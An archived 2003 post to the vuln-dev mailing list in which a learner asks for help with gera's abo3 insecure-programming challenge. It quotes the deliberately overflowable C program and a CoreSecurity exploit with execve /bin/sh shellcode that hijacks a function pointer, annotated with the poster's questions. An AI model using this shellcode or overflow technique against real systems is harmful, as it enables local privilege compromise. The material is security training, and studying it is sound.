Abo3 (can someone help me?)
From: Discussion Lists (discussions_at_lagraphico.com)
Date: 05/25/03
- Previous message: Joel Eriksson: "Re: [Vuln-dev Challenge] Challenge #2 (return-to-libc)"
- Next in thread: Murat Balaban: "Re: Abo3 (can someone help me?)"
- Reply: Murat Balaban: "Re: Abo3 (can someone help me?)"
- Reply: c0n: "Re: Abo3 (can someone help me?)"
- Reply: sin: "Re: Abo3 (can someone help me?)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Date: Sat, 24 May 2003 21:11:20 -0700 To: <vuln-dev@securityfocus.com>
Hi all,
This list has become far more interesting with the challenges. Thanks
to all for the participation. Recently, a user posted a particular
site:
http://community.core-sdi.com/~gera/InsecureProgramming/abo3.html
Which has the following code:
/* abo3.c *
* specially crafted to feed your brain by gera@core-sdi.com */
/* This'll prepare you for The Next Step */
int main(int argv,char **argc) {
extern system,puts;
void (*fn)(char*)=(void(*)(char*))&system;
char buf[256];
fn=(void(*)(char*))&puts;
strcpy(buf,argc[1]);
fn(argc[2]);
exit(1);
}
The issue here is that there is an exit(1) at the end of the code. So
even if you were to overwrite the return address, it would not matter
because there is no return (if I understand correctly).
The solution, according to this place:
http://www.core-sec.com/examples/core_vulnerabilities.pdf
is that we have to stick our shellcode in an environment variable, then
overwrite the address of that variable into the address of the fn()
function. So they lay out the following code to do it (questions
in-line):
/*
** exp3.c
** Coded by CoreSecurity - info@core-sec.com
**/
#include <string.h>
#include <uninstd.h>
#define BUFSIZE 261
/* Why 261? THe vulnerable program allocates 256 I thought. Where is
that other 5 going to/for? */
/* 24 bytes shellcode */
char shellcode[]=
/* 1 P h \ \ s h h \ b i */
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"
/* n P 2 */
"\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
/* so it is pushing /bin/sh backwards on the stack. Aleph1 talks about
how to create this code so I won't ask about it*/
int main(void) {
char *env[3] = {shellcode, NULL};
char evil_buffer[BUFFSIZE];
char *p;
/*Calculating address of shellcode */
int ret = 0xbffffffa - strlen(shellcode) -
strlen("/home/user/gera/abo3");
/* That is what I don't get. First, what is the 0xbffffffa address? Is
that where supposedly the
ending address of the code when everything is pushed onto the stack? I
believe strlen calculates the
length of a string? If that is the case, why do they need to calculate
shellcode, and the path. I
also assume the path is case specific. In other words, if the binary
has a different path on my system,
I would use that instead. */
/* constructing the buffer */
p = evil_buffer;
memset(p, 'B', 256); // Some junk
p += 256;
*((void **)p) = (void *) (ret);
p += 4;
*p = '\0';
/* Two arguments are passed to the vulnerable program */
execle("/home/user/gera/abo3", "abo3", evil_buffer, "A",
NULL,env);
__________________________________________
I don't completely understand much of that last part either, but I have
the K&R book, so I will drag it out and see what I can find out.
- Previous message: Joel Eriksson: "Re: [Vuln-dev Challenge] Challenge #2 (return-to-libc)"
- Next in thread: Murat Balaban: "Re: Abo3 (can someone help me?)"
- Reply: Murat Balaban: "Re: Abo3 (can someone help me?)"
- Reply: c0n: "Re: Abo3 (can someone help me?)"
- Reply: sin: "Re: Abo3 (can someone help me?)"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
